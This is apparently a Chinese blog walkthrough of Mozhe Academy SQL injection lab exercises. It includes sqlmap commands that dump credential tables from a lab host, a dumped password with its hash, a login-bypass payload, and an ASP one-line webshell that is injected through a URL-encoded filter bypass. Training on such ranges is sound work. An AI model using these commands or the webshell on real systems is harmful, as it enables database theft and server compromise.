墨者学院 靶场练习(一) SQL注入
墨者学院 在线靶场
工具: sqlmap
第一题: SQL手工注入漏洞测试(MySQL数据库-字符型)
利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715
进来点击公告
sqlmap 用于 mysql注入的步骤:
1:查找数据库
./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao --dbs
返回5个数据库,第二个 mozhe_discuz_stormgroup 是我们要找的数据库
2:通过第一步找到的数据库查找表
./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup --tables
返回2个表,用户信息表明显在 stormgroup_member 表里面
3:通过第二步找到的表查字段列名
./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member --columns
字段列名已经显示出来,有我们需要的登录名 name 和密码 password
4:获取字段的值
./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member -C id,name,password,status --dump
获取帐号密码成功,status 为1的可以登录
帐号是 mozhe ,密码是 0d3a3e696e5d90cbc1e5593ae5da4bfb (MD5加密了,解密后为 277656 )
第二题:SQL注入漏洞测试(时间盲注)
点击进去后,url 参数添加 type
用sqlmap 跑,方法和上面第一个注入相同,只是比较慢,因为是时间盲注
得到flag是 mozhel
第三题:SQL过滤字符后手工注入漏洞测试(第3题)
另一篇文章写,用手工注入:
https://mp.csdn.net/postedit/85157121
第四题:SQL过滤字符后手工绕过漏洞测试(万能口令)
很简单的一题
启动靶场 后台帐号 admin,密码随便填
登录显示登录失败,域名为 /no.php
改成 /yes.php 即可成功登录
这道题也可用 sqlmap 去跑,跑出来的帐号也可登录
第五题:SQL注入实战(防注入)-Access
题目提醒很明显
http://219.153.49.228:46553/news.asp?id=1 and 1=1
用御剑后台扫描工具 扫描,根据提醒,判断出 提交数据 的数据写入 sqlin.asp 文件
写入 asp 一句话木马<%eval request("test")%>
http://219.153.49.228:46553/news.asp?id=1 and 1=<%eval request("test")%>
发现被过滤掉,使用 url encode 编码
http://219.153.49.228:46553/news.asp?id=1%20and+1%3d%3C%25eval+request(%22test%22)%25%3E
写入一句话木马成功
用中国菜刀连接 ip/sqlin.asp 密码 test
菜刀连接成功,获取 key
第六题:SQL注入漏洞测试(登录绕过)
根据提示,用万能登录密码 1' or 1=1#
墨者学院 靶场练习(一) SQL注入相关推荐
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...
- brupsuite靶场 学徒等级 sql注入篇
靶场地址 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data | Web Securi ...
- 【安全练兵场】| BurpSuite靶场系列之SQL注入
文章来源|MS08067 安全练兵场 知识星球 本文作者:godunt(安全练兵场星球合伙人) 玩靶场 认准安全练兵场 成立"安全练兵场"的目的 目前,安全行业热度逐年增加,很多新 ...
- pikachu靶场通关之sql注入系列
目录 一.前置知识 二.SQL注入 三. 注入的一般方法 1. 手动注入 (1)联合查询union注入: (2)基于报错信息注入: (3)盲注: 2. 使用sqlmap注入 (1) 前置知识 (2) ...
- DVWA靶场通关(SQL注入)
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意 ...
- kali linux扫描sql注入,Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:
手工盲注:手工盲注分为基于布尔的盲注.基于时间的盲注以及基于报错的盲注,手工盲注步骤:1.判断是否存在注入,注入是字符型还是数字型;2.猜解当前数据库名;3.猜解数据库中表名;4.猜解表中的字段名;5 ...
- Pikachu漏洞靶场系列之SQL注入
文章目录 1.概述 1.1.发生原因 1.2.注入点类型 1.3.SQL注入流程 2.数字型注入(POST) 2.1.简易 2.2.拓展 3.字符型注入(GET) 4.搜索型注入 4.1.拓展 5.X ...
- 【墨者学院】SQL手动注入 靶场初体验
博主首次浅尝一下SQL注入,一顿操作,然后,啊哈 破解成功! 墨者学院靶场地址 step1: 判断注入 判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可. step2: 猜解 ...
- SQL注入漏洞(postgresql注入)
以前孤陋寡闻对postgresql这个数据库少有了解,后来与几个目前在企业实习的朋友聊天才得知他们有的公司项目用的是postgresql,有的公司是正在将原本的数据库迁移到postgresql.可见p ...
最新文章
- 小程序webview跳转页面后没有返回按钮完美解决方案
- android 计算器显示不全,Android5.0 计算器计算结果不准确和结果末尾的多余的‘0’没有省略的解决方法...
- 开发日记-20190830 关键词 读书笔记《Unix环境高级编程(第二版)》DAY 6
- 简单易上手的Bootstrap
- numpy 拼接_数据分析-numpy的拼接与交换
- mysql大批量数据写入_存储过程写入大批量数据,用于测试mysql查询优化
- 7-49 判断素数 (10 分)
- 华为云回应“关闭私有云”传闻 将进行业务调整形成混合云产品部
- 同步、异步、阻塞、非阻塞 简析
- iOS:using Segue in Popover
- 7、重建二叉树(Python)
- java + concat_Java中concat()方法和加号(+)运算符之间的区别
- 异常值监测的方法 Tukey test
- C++:建立一个被称为sroot()的函数,返回其参数的二次方根。重载sroot()3次,让它返回整数、长整数与双精度的二次方根
- 经纬财富:亳州炒白银操作方法,谨防亏损
- 冒泡法排序(从小到大)
- 大咖丨哥伦比亚教授周以真:人工智能恐慌以及大数据威胁反思
- 碎片化NFT研究报告:COSONFT提高NFT流动性的探索和实践
- Oracle数据库 SQL语句总结大赏
- SQL查询实现,记录排序编号
热门文章
- 快手客户端稳定性体系建设
- java三种方法拆分字符串
- 微博快手引流哪个好?引流推广平台主要都有哪些?
- linux如何改sftp端口,CentOS如何更改SFTP端口
- 本地 wordpress安装+php运行环境
- 机械师-创物者M 安装UBUNTU 20.04 (WIN 10 + Ubuntu 20 双系统)
- 语言C++之简单C++语言介绍
- 计算机网络实验哈工大威海,哈工大威海计算机网络实验1试编.doc
- 大数据运维到底是什么 又需要做些什么
- 学习使用MySQL 求平均值函数AVG